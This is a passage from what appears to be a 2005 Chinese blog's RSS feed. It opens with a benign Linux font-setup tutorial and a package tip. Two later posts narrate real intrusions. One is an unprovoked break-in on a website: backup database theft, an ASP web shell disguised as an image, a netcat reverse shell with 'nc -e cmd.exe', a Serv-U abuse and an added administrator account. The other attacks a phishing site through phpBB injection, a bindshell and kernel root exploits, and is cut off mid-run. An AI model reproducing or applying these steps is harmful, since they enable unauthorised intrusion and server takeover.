/>4.修改/etc/X11/XF86Config文件。也可以用kate编辑器来修改。要先把/etc/X11/XF86Config这件文件备份一下，然后再操作。这样做的目的是我们改错了文件，可以再把原文件恢复过去。<br /><br />1]备份<br />进入/etc/X11目录<br />[root@linuxsir01 root]# cd /etc/X11/<br />备份<br />[root@linuxsir01 X11]# cp XF86Config XF86ConfigBAK<br /><br />如果我们改错了，我们就要这样来恢复。以后改文件的过程都是这样，就不再多说了。<br />[root@linuxsir01 X11]# cp XF86ConfigBAK XF86Config<br /><br />2]用kate编辑器来改文件，在/etc/X11目录里操作<br /><br />[root@linuxsir01 X11]# kate XF86Config<br /><br />在FontPath &amp;quot;unix/:7100&amp;quot;前一行，加入FontPath &amp;quot;/home/fonts&amp;quot;这样的一行<br /><font size="5"><font color="#ff0000"><br />在Section &amp;quot;Module&amp;quot;这段内加入<br />Load &amp;quot;xtt&amp;quot;这一行，更详细的请见第二帖，如果不加Load &amp;quot;xtt&amp;quot;这行，会出现程序乱码！！</font></font><br />把Load &amp;quot;freetype&amp;quot;和Load &amp;quot;type1&amp;quot;这两行前面加上#号来注销掉。<br /><br />5.修改/etc/fonts/fonts.conf，还是象前面说一样，要备份。此过程省略<br /><br />[root@linuxsir01 X11]# cd /etc/fonts<br /><br />用kate编辑器打开fonts.conf<br /><br />[root@linuxsir01 fonts]# kate fonts.conf<br /><br />我们要在打开的fonts.conf中加入下面的一行<br /><font color="#0000ff"><br />&amp;lt;dir&amp;gt;/home/fonts&amp;lt;/dir&amp;gt;<br /></font><br /><br />加在什么地方呢？就加在下面这三行的前面就行<br /><br />&amp;lt;dir&amp;gt;/usr/X11R6/lib/X11/fonts/Type1&amp;lt;/dir&amp;gt;<br />&amp;lt;dir&amp;gt;/usr/share/fonts&amp;lt;/dir&amp;gt;<br />&amp;lt;dir&amp;gt;~/.fonts&amp;lt;/dir&amp;gt;<br /><br />[COLOIR=blue]您也可以下载fonts.conf的附件，下载后改名为fonts.conf，并复制到/etc/fonts目录下，比如您是下载到了/tmp目录中，我们可以这样做<br /><br />#cd /tmp<br />#cp fonts.conf.txt /etc/fonts/fonts.conf <br />也就是说把原文件覆盖就行了。<br /><br />[/COLOR]<br /><a href="http://www.linuxsir.com/bbs/attachment.php?s=&amp;postid=207853" target="_blank"><font color="#336699">http://www.linuxsir.com/bbs/attachm...=&amp;amp;postid=207853</font></a><br /><br />6.修改/etc/gtk/gtkrc.zh_CN文件，要先备份。前后有说过了，不再多说。<br /><br />[root@linuxsir01 root]# cd /etc/gtk/<br /><br />[root@linuxsir01 gtk]# kate gtkrc.zh_CN<br /><br />改成下面这样的。<br /><br /># $(gtkconfigdir)/gtkrc.zh_CN<br />#<br /># This file defines the fontsets for Chinese language (zh) using<br /># the simplified chinese standard GuoBiao as in mainland China (CN)<br />#<br /># 1999, Pablo Saratxaga &amp;lt;pablo@mandrakesoft.com&amp;gt;<br />#<br /><br />style &amp;quot;gtk-default-zh-cn&amp;quot; {<br />fontset = &amp;quot;-misc-simsun-medium-r-normal--14-*-*-*-*-*-gb2312.1980-0,\<br />-misc-simsun-medium-r-normal--14-*-*-*-*-*-gb2312.1980-0&amp;quot;<br />}<br />class &amp;quot;GtkWidget&amp;quot; style &amp;quot;gtk-default-zh-cn&amp;quot;<br /><font color="#ff0000"><br />对于/etc/gtkrc.zh_CN中，也可以下载我传上来的附件。下载后要改名为gtkrc.zh_CN,要注意大小写，然后拷到/etc/gtk目录下<br /><br /><a href="http://www.linuxsir.com/bbs/attachment.php?s=&amp;postid=205425" target="_blank"><font color="#336699">http://www.linuxsir.com/bbs/attachm...=&amp;amp;postid=205425</font></a><br /><br /></font><br /><font color="#0000ff"><br />到此为止，前期的准备工作已经结束了，我们来美化各个用户的gnome和kde了。我们以root用户为例来解说明：<br /></font><br /><br />1.在当前用户目录下的.bashrc文件里加入:<br />export GDK_USE_XFT=0<br />如果是root用户，就要如下操作，不要忘记备份.bashrc，注意：前面有个小点。备份的过程省略，过程请参考前文。<br /><br />[root@linuxsir01 root]# kate ~/.bashrc<br /><br />把export GDK_USE_XFT=0这行，放在下面的两行中间。<br /># .bashrc<br />export GDK_USE_XFT=0<br /># User specific aliases and functions<br /><br />2.如果您是以root身份登入的gnome桌面，就要把gnome的字体设置成san12<br />这个过程在gnome菜单=》首选项=》字体中设置。<br /><font color="#0000ff"><br />3.如果让kde也一样有美观的效果，我们就要运行如下的命令<br /><br />[root@linuxsir01 root]# qtconfig<br /><br />具体如图所示，更改完后，不要忘记[保存]<br /></font><br /><br />4.以root身份登入kde，我们就要在kde中的控制中心-》观感-》字体中，你可以把字体设置为simsun 12就好了。<br />在观感=》桌面=》外观=》把字体设置为simsun 大小为12<br /><br />在kde控制中心=》文件管理器=》外观中，把字体设置为 simsun 12<br /><font color="#0000ff"><br />5.mozilla的字体[必须升级mozilla才能解决英文字体发虚的现象]<br /></font><br />mozilla菜单edit-&amp;gt;preference-》appearence-》fonts中。如图设置<br /><br />如果想让mozilla升级成中文版的，可以参考这个帖子。<br /><a href="http://www.linuxsir.com/bbs/showthread.php?s=&amp;threadid=10026" target="_blank"><font color="#336699">http://www.linuxsir.com/bbs/showthr...&amp;amp;threadid=10026</font></a><br /><br />如果您下载的是Mozilla的免安装包，请看这里<br /><a href="http://people.linux.net.cn/holywen/" target="_blank"><font color="#336699">http://people.linux.net.cn/holywen/</font></a><br />我们就要先把/usr/lib/mozilla-1.2.1目录改名为mozilla-1.2.1BAK，然后我们把下载下来的包复制到/usr/lib/mozilla-1.2.1目录里。<br /><br />tar zxvf *.tar.gz<br /><br />#cp -r mozilla /usr/lib/mozilla-1.2.1<br /><br />11.xmms的字体设置，或看图设置：在XMMS的菜单上=》选项=》功能设定=》fonts中。把<br /><br />xmms的playlist字体为:<br /><br />-misc-simsun-medium-r-normal-*-*-120-*-*-c-*-gbk-0<br />main window是:<br /><br />-misc-simsun-medium-r-normal-*-*-120-*-*-c-*-gbk-0<br /><br />12.gnome中的终端的字体设置<br /><br />在终端的菜单上：选[编辑]-》配制文件-》编辑-》Default=》编辑=》General中，Use the same font as other applications前面的小方框里面的勾去掉，然后把字体设置为simsun。就OK了。极为漂亮。<br /><br />13.kde的终端字体，我们也可以用上面的方法。不过有点不同。<br /><br />在kde桌面的菜单上，点[系统工具]=》终端，在其菜单上，点[设置]-》字体=》<br />我们先随便选一个字体，然后就应用一下。我们还要重复操作一次这个过程，只是这次，我们要把字体设置成为simsun。为什么这样做，试一下就明白了。设置一下，然后我不要忘记点[设置]=》保存。<br /><br />这样kde的终端字体也极其美观。</p>]]></description> 
<guid isPermaLink="false">3094905@http://heijin.bokee.com/</guid> 
<dc:subject>Linux学习</dc:subject> 
<dc:date>2005-10-01T19:57:31Z</dc:date> 
</item> 
<item> 
<title><![CDATA[RealPlayer For Linux+Apt Update librc++.so.5]]></title> 
<link>http://heijin.bokee.com/3090984.html</link> 
<description><![CDATA[<p>作者：h4k.b4n</p><p>因为FC4的GCC太他妈的高级了!导致我口爱的Realplayer不能够编译成功!幸亏有APT网上更新,要不然就死悄悄了!哈哈哈哈!<br /><br />[root@localhost ~]# apt-get install libc++.so.5<br />然后会搜索更新列表,从而安装了!这样再安装REAL就OK了!哈哈哈 </p>]]></description> 
<guid isPermaLink="false">3090984@http://heijin.bokee.com/</guid> 
<dc:subject>经验技巧</dc:subject> 
<dc:date>2005-10-01T10:58:26Z</dc:date> 
</item> 
<item> 
<title><![CDATA[突破一流信息监控系统传木马并获得系统权限]]></title> 
<link>http://heijin.bokee.com/3090939.html</link> 
<description><![CDATA[<font size="2">文章作者：Bluelight<br /><br /><br />今天终于GK完了<br />无聊闲逛在网上，意识催魂试的找我要文章...<br />哈~发现一迷信网站，不爽...<br />（入侵需要理由吗？不需要吗？需要吗？....）<br /><br />用<br />telnet </font><a href="http://www.xxx.com/" target="_blank"><font size="2">www.xxx.com</font></a><font size="2"> 80<br /><br />get enter<br /><br />HTTP/1.1 400 Bad Request<br />Server: Microsoft-IIS/5.0<br />Date: Wed, 08 Jun 2005 11:56:00 GMT<br />Content-Type: text/html<br />Content-Length: 87<br /><br />&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;Error&amp;lt;/title&amp;gt;&amp;lt;/he<br />&amp;lt;/html&amp;gt;<br /><br />失去了跟主机的连接。<br /><br />F:\Documents and Settings\lu\桌面&amp;gt;<br /><br />看到没，获得很多有用的信息哦<br /><br />先去WEB上看看有没有什么漏洞<br /><br />哈！发现DVBBS7.1 论坛<br /><br />前几天有朋友告诉我件事情，说有许多白痴管理员用备分的日期做备分数据库的名字哦！试试看！<br /><br />dvbbs7.1 是4月6日更新的，他用该用200504**.mdb做名字来命名以前的旧数据库！<br />没办法，试试！<br /><br /></font><a href="http://www.xxxx.com/bbs/databackup/20050406.mdb" target="_blank"><font size="2">http://www.xxxx.com/bbs/databackup/20050406.mdb</font></a><br /><a href="http://www.xxxx.com/bbs/databackup/20050407.mdb" target="_blank"><font size="2">http://www.xxxx.com/bbs/databackup/20050407.mdb</font></a><br /><a href="http://www.xxxx.com/bbs/databackup/20050408.mdb" target="_blank"><font size="2">http://www.xxxx.com/bbs/databackup/20050408.mdb</font></a><br /><font size="2">.....<br />晕..到32了还没出来<br />管理员不是白痴哦！<br /></font><a href="http://www.xxxx.com/bbs/databackup/200504.mdb" target="_blank"><font size="2">http://www.xxxx.com/bbs/databackup/200504.mdb</font></a><br /><font size="2">faint!他不是白痴谁是！<br />跳出了可爱的下载对话框！<br /><br />downloading.... 完成！<br /><br />用辅臣数据库浏览器打开，选择Dv_Log(2586)<br />字段名选择l_content 关键字添password2<br /><br />点查询<br />许多信息出来了哦！<br />经过筛选<br />发现一条：<br />oldusername=%B5%F0%B7%C0&amp;amp;username2=%B5%F0%B7%C0&amp;amp;password2=19841202&amp;amp;adduser=%B5%F0%B7%C0&amp;amp;id=12&amp;amp;Submit=%B8%FC+%D0%C2<br /><br />哈，想到什么了？登陆啊，不过用户名不知道，是%B8%F0%B7%C9吗~开玩笑，那简单，其实转化这个我用他本身的页面，<br />在登陆页面上用户名和密码乱添<br />点登陆<br /></font><a href="http://www.xxx.com/bbs/showerr.asp?BoardID=0&amp;ErrCodes=10" target="_blank"><font size="2">http://www.xxx.com/bbs/showerr.asp?BoardID=0&amp;amp;ErrCodes=10</font></a><font size="2">,11&amp;amp;action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2<br /><br />%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2这句话意思是“填写登录信息”<br /><br />那么就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2换成%B5%F0%B7%C0！<br /><br /><br />提交！看到了吧！用户名是“叼防”<br />晕！<br />什么名字啊！不管了，登陆！<br />成功！呵呵~把老兵的asp站长助手另存为admin_system321.gif<br /><br />上传！<br /><br />晕！<br /><br />一流信息监控系统提醒您：很抱歉，由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制，本次操作无效，系统已记录您的IP及您提交的所有数据。请注意，不要提交任何违反国家规定的内容！本次拦截的相关信息为：drop table<br /><br />换海阳top的传，在晕...还是被拦截！<br /><br />不行！我就不信上不去！<br /><br />&amp;lt;object runat=server id=oScriptlhn scope=page classid=&amp;quot;clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8&amp;quot;&amp;gt;&amp;lt;/object&amp;gt; <br />&amp;lt;%if err then%&amp;gt; <br />&amp;lt;object runat=server id=oScriptlhn scope=page classid=&amp;quot;clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B&amp;quot;&amp;gt;&amp;lt;/object&amp;gt; <br />&amp;lt;% <br />end if %&amp;gt; <br />&amp;lt;form method=&amp;quot;post&amp;quot;&amp;gt; <br />&amp;lt;input type=text name=&amp;quot;cmdx&amp;quot; size=60 value=&amp;quot;/cmd.exe&amp;quot;&amp;gt;&amp;lt;br&amp;gt; <br />&amp;lt;input type=text name=&amp;quot;cmd&amp;quot; size=60&amp;gt;&amp;lt;br&amp;gt; <br />&amp;lt;input type=submit value=&amp;quot;cmd&amp;quot;&amp;gt;&amp;lt;/form&amp;gt; <br />&amp;lt;textarea readonly cols=80 rows=20&amp;gt; <br />&amp;lt;%On Error Resume Next <br />if request(&amp;quot;cmdx&amp;quot;)=&amp;quot;cmd.exe&amp;quot; then <br />response.write oScriptlhn.exec(&amp;quot;cmd.exe /c&amp;quot;&amp;amp;request(&amp;quot;cmd&amp;quot;)).stdout.readall <br />end if <br />response.write oScriptlhn.exec(request(&amp;quot;cmdx&amp;quot;)&amp;amp;&amp;quot; /c&amp;quot;&amp;amp;request(&amp;quot;cmd&amp;quot;)).stdout.readall <br />%&amp;gt; <br />&amp;lt;/textarea&amp;gt; <br /><br />保存成为cmd.gif<br />上传成功！<br />登陆后台用数据库管理还原成根目录下的admin_system321.asp<br /><br />_system321.asp&amp;quot;&amp;gt;</font><a href="http://www.xxx.com/bbs/admin_system321.asp" target="_blank"><font size="2">http://www.xxx.com/bbs/admin_system321.asp</font></a><br /><br /><font size="2">登陆，啊...CMD窗口那里显示<br /><br />无法找到该页<br />您正在搜索的页面可能已经删除、更名或暂时不可用。 <br />--------------------------------------------------------------------------------<br /><br />请尝试以下操作：<br /><br />确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。 <br />如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。 <br />单击后退按钮尝试另一个链接。 <br />HTTP 错误 404 - 文件或目录未找到。<br />Internet 信息服务 (IIS)<br /><br />--------------------------------------------------------------------------------<br /><br />技术信息（为技术支持人员提供）<br /><br />转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。 <br />打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。 <br /><br />把我的SYSTEM32下的CMD.exe用记事本打开，另存为111.gif上传！<br />在用刚才的方法备分成跟目录下的cmd.exe<br /><br />把刚才cmd.gif里cmd.exe改成他的绝对路径<br /><br />全都上传！然后备分！<br />访问_system321.asp&amp;quot;&amp;gt;</font><a href="http://www.xxx.com/bbs/admin_system321.asp" target="_blank"><font size="2">http://www.xxx.com/bbs/admin_system321.asp</font></a><br /><font size="2">哈！成功！<br />在用上面的方法把nc传上去！<br />本地命令提示符执行 nc -vv -l -p 9999<br />在webshell里执行nc.exe -e cmd.exe 自己IP 9999<br />NC监听的窗口就出现一个可爱的SHELL<br /><br />在写个文件如下<br /><br />echo USER LocalAdministrator&amp;gt;2.txt<br />echo PASS #l@$ak#.lk;0@P&amp;gt;&amp;gt;2.txt<br />echo SITE MAINTENANCE&amp;gt;&amp;gt;2.txt<br />echo -setdomain&amp;gt;&amp;gt;2.txt<br />echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 &amp;gt;&amp;gt;2.txt<br />echo -DynDNSEnable=0 &amp;gt;&amp;gt;2.txt<br />echo DynIPName=&amp;gt;&amp;gt;2.txt<br />echo -SETUSERSETUP&amp;gt;&amp;gt;2.txt<br />echo -IP=0.0.0.0&amp;gt;&amp;gt;2.txt<br />echo -PortNo=22&amp;gt;&amp;gt;2.txt<br />echo -User=tyrant&amp;gt;&amp;gt;2.txt<br />echo -Password=19851011&amp;gt;&amp;gt;2.txt<br />echo -HomeDir=c:\&amp;gt;&amp;gt;2.txt<br />echo -Maintenance=System&amp;gt;&amp;gt;2.txt<br />echo -Ratios=None&amp;gt;&amp;gt;2.txt<br />echo Access=c:\^|RWAMEICDP&amp;gt;&amp;gt;2.txt<br />echo -GETUSERSETUP&amp;gt;&amp;gt;2.txt<br /><br />&amp;quot;^&amp;quot;符号的作用相信大家都了解吧！我不罗嗦了。<br /><br />把上面批处理保存为1.txt<br /><br />在SHELL中用NC提交<br /><br />nc 127.0.0.1 43958 &amp;lt;1.txt<br /><br />回显发现<br /><br />220 Domain settings saved<br />200-User=test1<br />200 User settings saved<br /><br />成功了！成功添加了用户tyrant密码19851011<br /><br />登陆对方的ftp<br />转到system32文件夹下<br /><br />quote site exec &amp;quot;net.exe user tyrant 19851011 /add&amp;quot;<br /><br />quote site exec &amp;quot;net.exe localgroup administrators tyrant /add&amp;quot;<br /><br />quote site exec &amp;quot;net.exe user start telnet&amp;quot;<br /><br />用tyrant管理员telnet上去<br />传个批处理开3389<br /><br />哈...正在连接到...<br /><br />文章到此结束</font><br />]]></description> 
<guid isPermaLink="false">3090939@http://heijin.bokee.com/</guid> 
<dc:subject>安全文摘</dc:subject> 
<dc:date>2005-10-01T10:49:39Z</dc:date> 
</item> 
<item> 
<title><![CDATA[我那次入侵中国虚假银行的实录]]></title> 
<link>http://heijin.bokee.com/3090881.html</link> 
<description><![CDATA[<font size="2">信息来源：internet<br /><br /><br />本来不打算把这个不成功的入侵写出来的，后来有几个朋友想看，既然能在内部交流，也没有什么见不得人的，索性发出来，初学者可以借鉴一点经验，高手可以在此基础上作更多尝试，我也想多学点东西。<br />27日晚看到天天网的一片报道：中国银行网站再次遭遇克隆 假网站远在北美，<br />本站转载路径：</font><a href="http://www.coolersky.com/web/news/20050228014041.asp" target="_blank"><font size="2">http://www.coolersky.com/web/news/20050228014041.asp</font></a><br /><font size="2">本来要整理规划的，既然出了这个事情，好歹看看吧。废话不说，开始！<br />1、收集信息<br /><br />服务器信息：<br />Apache/1.3.33 &amp;nbsp; <br />PHP/4.3.9<br />网站主文件：<br />_blank&amp;gt;</font><a href="http://www.banochi.net/english/index.shtml" target="_blank"><font size="2">http://www.banochi.net/english/index.shtml</font></a><br /><br /><br /><font size="2">查看虚假网站，基本没发现什么可用的东西，估计只有记录密码和ip的cgi程序。除了服务器入侵，还可以考虑旁注。<br />检索其他站点，分析了几个php站点的注入，没太多利用的地方。想起phpbb的洞洞，写段代码检索一下viewtopic.php文件，找到一个phpbb2.0.10入侵点<br /><br />_blank&amp;gt;</font><a href="http://www.bits-clsu.org/forum/viewtopic.php?t=1" target="_blank"><font size="2">http://www.bits-clsu.org/forum/viewtopic.php?t=1</font></a><br /><br /><br /><font size="2">事后才想起可以用旁注工具直接来检索，反正都一样。<br />2、上传木马<br />利用phpbb的洞，漏洞介绍“phpBB远程任意SQL注入漏洞”，“phpbb&amp;lt;2.0.11程序的sql注入漏洞分析”上传php后门。<br />3、生成bindshell<br />我还在看文件的时候，Edward就已经做了个bindshell出来，呵呵！基本方法：<br />上传bindshell.c<br /><br />gcc -o /tmp/bind bindshell.c<br />/tmp/bind <br /><br /><br />nc上去看看，还是在shell下比较方便。<br /><br />nc -vv 216.22.48.72 7758<br /><br /><br />4、采集系统信息<br />拿到webshell后就可以获得一些基本的信息包括passwd、httpd.conf等等，检索到虚假网站的绝对路径/home/banochin/public_html/，在webshell中查看文件创建的时期是服务器时间2004-12-15，在其cgi-bin目录下有如下文件<br /><br />文件 &amp;nbsp; 创建日期 &amp;nbsp; &amp;nbsp; &amp;nbsp; 最后修改 &amp;nbsp; &amp;nbsp; &amp;nbsp; 大小 &amp;nbsp; 属性 &amp;nbsp; <br />[member] &amp;nbsp; 2005-02-21 21:39:03 2005-02-21 21:39:03 &amp;lt;dir&amp;gt; 0700 <br />errlog.dat 2005-02-28 00:32:22 2005-02-28 00:32:22 140.186 KB 0600 <br />id.dat &amp;nbsp; 2005-02-24 10:48:35 2005-02-24 10:48:35 1.727 KB 0600 <br />index.htm 2004-12-15 03:19:51 2004-12-15 03:19:51 0.697 KB 0644<br />pwd.dat &amp;nbsp; 2005-02-25 00:36:15 2005-02-25 00:36:15 0.170 KB 0600 <br />pwdbak.dat 2004-12-15 03:24:17 2004-12-15 03:19:55 0.516 KB 0600 <br />security.cgi 2004-12-15 03:24:03 2004-12-15 03:20:00 44.363 KB 0700 <br />visemailer.cgi 2004-12-15 03:24:04 2004-12-15 03:20:02 3.554 KB 0700 <br /><br /><br />可以看到最后记录的密码日期是2月25日，而浏览目录后发现还包括了很多其他语言的中国银行网站内容，但基本都是html文件，想必是从中国银行直接webdump下来的。<br />内核信息，因为我们对其目录没有写权限，接着要做的就是提权了。前后大概用了1小时左右，而剩下的提权工作却花了我1天多的时间，结果还是没搞定，郁闷！<br /><br />uname -r<br />2.4.20-021stab022.11.777-enterprise<br /><br /><br />5、本地提升权限测试<br />增加环境变量<br />export PATH=/usr/bin:$PATH<br />否则会出现collect2: cannot find `ld'错误！<br />（1）Linux Kernel moxa串行驱动BSS溢出漏洞<br />grsecurity 2.1.0 release / 5 Linux kernel advisories<br />URL：<br />_bug&amp;amp;do=view&amp;amp;bug_id=7446&amp;amp;keyword=&amp;quot; target=_blank&amp;gt;</font><a href="http://www.nsfocus.net/index.php?act=sec_bug&amp;do=view&amp;bug_id=7446&amp;keyword=" target="_blank"><font size="2">http://www.nsfocus.net/index.php?act=sec_bug&amp;amp;do=view&amp;amp;bug_id=7446&amp;amp;keyword=</font></a><br /><font size="2">_blank&amp;gt;</font><a href="http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html" target="_blank"><font size="2">http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html</font></a><br /><font size="2">文件：<br />_and_patches.tgz&amp;quot; target=_blank&amp;gt;</font><a href="http://grsecurity.net/~spender/exploits_and_patches.tgz" target="_blank"><font size="2">http://grsecurity.net/~spender/exploits_and_patches.tgz</font></a><br /><font size="2">测试：<br /><br />wget _and_patches.tgz&amp;quot; target=_blank&amp;gt;</font><a href="http://grsecurity.net/~spender/exploits_and_patches.tgz" target="_blank"><font size="2">http://grsecurity.net/~spender/exploits_and_patches.tgz</font></a><br /><font size="2">tar -zxvf exploits_and_patches.tgz<br />cd exploits_and_patches<br />make alloc=0x100000<br />------------------------------------------------------------------------<br />nasm -f elf -DALLOCATE=32482374 mlock-dos.S<br />make: nasm: Command not found<br />make: *** [ all ] Error 127<br />------------------------------------------------------------------------<br /><br /><br />结论：<br />缺少nasm，即使上传rpm也不能够执行安装！<br />（2）Linux Kernel uselib()特权提升漏洞<br />Linux kernel sys_uselib local root vulnerability<br />URL：<br />_bug&amp;amp;do=view&amp;amp;bug_id=7326&amp;amp;keyword=&amp;quot; target=_blank&amp;gt;</font><a href="http://www.nsfocus.net/index.php?act=sec_bug&amp;do=view&amp;bug_id=7326&amp;keyword=" target="_blank"><font size="2">http://www.nsfocus.net/index.php?act=sec_bug&amp;amp;do=view&amp;amp;bug_id=7326&amp;amp;keyword=</font></a><br /><font size="2">_blank&amp;gt;</font><a href="http://marc.theaimsgroup.com/?l=bugtraq&amp;m=110513415105841&amp;q=raw" target="_blank"><font size="2">http://marc.theaimsgroup.com/?l=bugtraq&amp;amp;m=110513415105841&amp;amp;q=raw</font></a><br /><font size="2">_blank&amp;gt;</font><a href="http://marc.theaimsgroup.com/?l=bugtraq&amp;m=110512575901427&amp;w=2" target="_blank"><font size="2">http://marc.theaimsgroup.com/?l=bugtraq&amp;amp;m=110512575901427&amp;amp;w=2</font></a><br /><font size="2">_blank&amp;gt;</font><a href="http://isec.pl/vulnerabilities/isec-0021-uselib.txt" target="_blank"><font size="2">http://isec.pl/vulnerabilities/isec-0021-uselib.txt</font></a><br /><font size="2">文件：<br />_blank&amp;gt;</font><a href="http://marc.theaimsgroup.com/?l=bugtraq&amp;m=110512575901427&amp;q=p3" target="_blank"><font size="2">http://marc.theaimsgroup.com/?l=bugtraq&amp;amp;m=110512575901427&amp;amp;q=p3</font></a><br /><font size="2">测试：<br /><br />gcc -O2 -fomit-frame-pointer elflbl_v108.c -o elflbl_v108<br />------------------------------------------------------------------------<br />elflbl_v108.c: In function `check_vma_flags':<br />elflbl_v108.c:545: warning: deprecated use of label at end of compound statement<br />------------------------------------------------------------------------<br />./elflbl_v108<br />------------------------------------------------------------------------<br />child 1 VMAs 0<br />[+] moved stack bff73000, task_size=0xc0000000, map_base=0xbf800000<br />[+] vmalloc area 0xc7c00000 - 0xcf707000<br />Wait... -Segmentation fault<br />-------------------------------------------------------------------------<br />gcc -O2 -fomit-frame-pointer elflbl_v109.c -o elflbl_v109<br />./elflbl_v109<br />------------------------------------------------------------------------<br />[+] SLAB cleanup<br />[-] FAILED: get_slab_objs: /proc/slabinfo not readable? (No such file or directory)<br />sh: line 9: 24080 Killed &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ./elflbl_v109<br />------------------------------------------------------------------------<br /><br /><br />（3）Linux内核本地整数溢出和内存泄露漏洞<br />fun with linux kernel<br />URL：<br />_bug&amp;amp;do=view&amp;amp;bug_id=7269&amp;amp;keyword=&amp;quot; target=_blank&amp;gt;</font><a href="http://www.nsfocus.net/index.php?act=sec_bug&amp;do=view&amp;bug_id=7269&amp;keyword=" target="_blank"><font size="2">http://www.nsfocus.net/index.php?act=sec_bug&amp;amp;do=view&amp;amp;bug_id=7269&amp;amp;keyword=</font></a><br /><font size="2">_blank&amp;gt;</font><a href="http://marc.theaimsgroup.com/?l=full-disclosure&amp;m=110374209001676&amp;w=2" target="_blank"><font size="2">http://marc.theaimsgroup.com/?l=full-disclosure&amp;amp;m=110374209001676&amp;amp;w=2</font></a><br /><font size="2">测试：<br /><br />gcc -o vc vc_resize.c<br />./vc_resize<br />------------------------------------------------------------------------<br />open: No such device or address<br />------------------------------------------------------------------------<br />gcc memory_leak.c -o memory_leak<br />------------------------------------------------------------------------<br />memory_leak.c:80:2: warning: no newline at end of file<br />------------------------------------------------------------------------<br /><br /><br />（4）Linux Kernel do_mremap VMA本地权限提升漏洞<br />Linux kernel do_mremap VMA limit local privilege escalation<br />URL：<br />_bug&amp;amp;do=view&amp;amp;bug_id=6102&amp;amp;keyword=%CC%E1%C9%FD&amp;quot; target=_blank&amp;gt;</font><a href="http://www.nsfocus.net/index.php?act=sec_bug&amp;do=view&amp;bug_id=6102&amp;keyword=%CC%E1%C9%FD" target="_blank"><font size="2">http://www.nsfocus.net/index.php?act=sec_bug&amp;amp;do=view&amp;amp;bug_id=6102&amp;amp;keyword=%CC%E1%C9%FD</font></a><br /><font size="2">_blank&amp;gt;</font><a href="http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt" target="_blank"><font size="2">http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt</font></a><br /><font size="2">文件：<br />_pte.c&amp;quot; target=_blank&amp;gt;</font><a href="http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c" target="_blank"><font size="2">http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c</font></a><br /><font size="2">测试：<br /><br />gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte<br />./mremap_pte<br />------------------------------------------------------------------------<br />[+] kernel 2.4.20-021stab022.11.777-enterprise vulnerable: YES exploitable YES<br />MMAP #65530 0x50bfa000 - 0x50bfb000<br />[-] Failed<br />------------------------------------------------------------------------<br /><br /><br />（5）Linux Kernel kmod/ptrace竞争条件权限提升漏洞<br />linux kmod/ptrace bug - details<br />URL：<br />_bug&amp;amp;do=view&amp;amp;bug_id=4570&amp;amp;keyword=%CC%E1%C9%FD&amp;quot; target=_blank&amp;gt;</font><a href="http://www.nsfocus.net/index.php?act=sec_bug&amp;do=view&amp;bug_id=4570&amp;keyword=%CC%E1%C9%FD" target="_blank"><font size="2">http://www.nsfocus.net/index.php?act=sec_bug&amp;amp;do=view&amp;amp;bug_id=4570&amp;amp;keyword=%CC%E1%C9%FD</font></a><br /><font size="2">_blank&amp;gt;</font><a href="http://marc.theaimsgroup.com/?l=bugtraq&amp;m=104811209231385&amp;w=2" target="_blank"><font size="2">http://marc.theaimsgroup.com/?l=bugtraq&amp;amp;m=104811209231385&amp;amp;w=2</font></a><br /><font size="2">文件：<br />_blank&amp;gt;</font><a href="http://august.v-lo.krakow.pl/~anszom/km3.c" target="_blank"><font size="2">http://august.v-lo.krakow.pl/~anszom/km3.c</font></a><br /><font size="2">测试：<br /><br />gcc -o km3 km3.c<br />./km3 ?<br />------------------------------------------------------------------------<br />Usage: ./km3 [-d] [-b] [-r] [-s] [-c executable]<br />&amp;nbsp; -d &amp;nbsp; -- use double-ptrace method (to run interactive programs)<br />&amp;nbsp; -b &amp;nbsp; -- start bindshell on port 4112<br />&amp;nbsp; -r &amp;nbsp; -- support randomized pids<br />&amp;nbsp; -c &amp;nbsp; -- choose executable to start<br />&amp;nbsp; -s &amp;nbsp; -- single-shot mode - abort if unsuccessful at the first try<br />------------------------------------------------------------------------<br />./km3 -s<br />------------------------------------------------------------------------<br />Linux kmod + ptrace local root exploit by &amp;lt;</font><a href="mailto:anszom@v-lo.krakow.pl"><font size="2">anszom@v-lo.krakow.pl</font></a><font size="2">&amp;gt;<br /><br />=&amp;gt; Simple mode, executing /usr/bin/id &amp;gt; /dev/tty<br />sizeof(shellcode)=95<br />=&amp;gt; Child process started..........<br />Failed<br />------------------------------------------------------------------------<br /><br /><br />（6）Linux Kernel i386 SMP页错误处理器特权提升漏洞<br />Linux kernel i386 SMP page fault handler privilege escalation<br />URL：<br />_bug&amp;amp;do=view&amp;amp;bug_id=7338&amp;quot; target=_blank&amp;gt;</font><a href="http://www.nsfocus.net/index.php?act=sec_bug&amp;do=view&amp;bug_id=7338" target="_blank"><font size="2">http://www.nsfocus.net/index.php?act=sec_bug&amp;amp;do=view&amp;amp;bug_id=7338</font></a><br /><font size="2">_blank&amp;gt;</font><a href="http://marc.theaimsgroup.com/?l=bugtraq&amp;m=110554694522719&amp;w=2" target="_blank"><font size="2">http://marc.theaimsgroup.com/?l=bugtraq&amp;amp;m=110554694522719&amp;amp;w=2</font></a><br /><font size="2">测试：<br /><br />gcc -o smp smp.c<br />./smp<br />------------------------------------------------------------------------<br />[+] in thread 1 (pid = 5400)<br />[+] in thread 2 (pid = 5401)<br />[+] rdtsc calibration: 53428<br />[+] exploiting 